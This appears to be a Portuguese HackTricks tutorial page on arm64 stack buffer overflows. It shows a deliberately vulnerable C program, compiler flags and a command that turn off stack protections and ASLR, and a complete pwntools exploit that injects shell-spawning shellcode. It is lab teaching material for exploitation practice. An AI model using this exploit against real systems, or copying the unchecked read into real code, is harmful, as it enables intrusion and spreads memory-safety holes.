mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-24 03:53:29 +00:00
103 lines
4.1 KiB
Markdown
103 lines
4.1 KiB
Markdown
# Stack Shellcode - arm64
|
|
|
|
{% hint style="success" %}
|
|
Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
|
|
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Compartilhe truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
|
|
|
|
</details>
|
|
{% endhint %}
|
|
|
|
Encontre uma introdução ao arm64 em:
|
|
|
|
{% content-ref url="../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md" %}
|
|
[arm64-basic-assembly.md](../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md)
|
|
{% endcontent-ref %}
|
|
|
|
## Código 
|
|
```c
|
|
#include <stdio.h>
|
|
#include <unistd.h>
|
|
|
|
void vulnerable_function() {
|
|
char buffer[64];
|
|
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
|
|
}
|
|
|
|
int main() {
|
|
vulnerable_function();
|
|
return 0;
|
|
}
|
|
```
|
|
Compile sem pie, canário e nx:
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack
|
|
```
|
|
{% endcode %}
|
|
|
|
## Sem ASLR & Sem canário - Stack Overflow 
|
|
|
|
Para parar o ASLR, execute:
|
|
```bash
|
|
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
|
|
```
|
|
Para obter o [**offset do bof verifique este link**](../ret2win/ret2win-arm64.md#finding-the-offset).
|
|
|
|
Exploit:
|
|
```python
|
|
from pwn import *
|
|
|
|
# Load the binary
|
|
binary_name = './bof'
|
|
elf = context.binary = ELF(binary_name)
|
|
|
|
# Generate shellcode
|
|
shellcode = asm(shellcraft.sh())
|
|
|
|
# Start the process
|
|
p = process(binary_name)
|
|
|
|
# Offset to return address
|
|
offset = 72
|
|
|
|
# Address in the stack after the return address
|
|
ret_address = p64(0xfffffffff1a0)
|
|
|
|
# Craft the payload
|
|
payload = b'A' * offset + ret_address + shellcode
|
|
|
|
print("Payload length: "+ str(len(payload)))
|
|
|
|
# Send the payload
|
|
p.send(payload)
|
|
|
|
# Drop to an interactive session
|
|
p.interactive()
|
|
```
|
|
A única coisa "complicada" a encontrar aqui seria o endereço na pilha para chamar. No meu caso, eu gerei o exploit com o endereço encontrado usando gdb, mas depois, ao explorá-lo, não funcionou (porque o endereço da pilha mudou um pouco).
|
|
|
|
Eu abri o **`core` file** gerado (`gdb ./bog ./core`) e verifiquei o endereço real do início do shellcode.
|
|
|
|
{% hint style="success" %}
|
|
Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
|
|
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Compartilhe truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
|
|
|
</details>
|
|
{% endhint %}
|